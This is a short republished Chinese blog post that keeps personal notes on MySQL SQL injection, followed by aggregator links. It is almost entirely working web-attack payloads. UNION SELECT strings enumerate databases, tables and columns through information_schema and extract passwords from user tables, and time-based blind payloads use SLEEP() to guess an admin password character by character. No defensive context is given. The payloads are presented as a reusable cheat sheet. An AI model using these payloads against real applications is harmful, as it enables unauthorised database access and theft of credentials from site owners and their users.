【原创】mysql注入

其他 2019-07-06 08:17:30 阅读次数: 0
原文链接: http://www.cnblogs.com/blck/p/4978220.html
最近在搞mysql的注入的时候自己记录一下,留个纪念,以后忘记了可以看看。 

查询表

 
'and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1-- 
'and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761-- 
 
 
查询字段
 
and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码 limit 1,1-- 
 
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码-- 
 
查询数据
 
'and 1=2 union select 1,concat(password) from users limit 0,1-- 
 
基于时间的盲注
SELECT user FROM tbl_user where user='aaa'+0 and if((select 1 from tbl_user where user=“admin" and password='1234567'),sleep(5),1);
 
a'+0 UNION SELECT IF( ASCII( SUBSTRING(  PASSWORD , 1, 1 ) ) =50, SLEEP( 10 ) , NULL )  FROM admin WHERE username =  'admin'--

转载于:https://www.cnblogs.com/blck/p/4978220.html

猜你喜欢

转载自blog.csdn.net/weixin_30284355/article/details/94783624
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
Java自定义时间格式
同步整形电路
在开发中最最最常用的字符串的属性大集合
Linux 查看端口占用并杀掉
Java基础四:ArrayList
多线程之死锁就是这么简单
mysql 基础命令集
awk 命令详解
Centos6.3编译安装nginx+php步骤
OCR (Optical Character Recognition,光学字符识别)
每日归档
更多
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022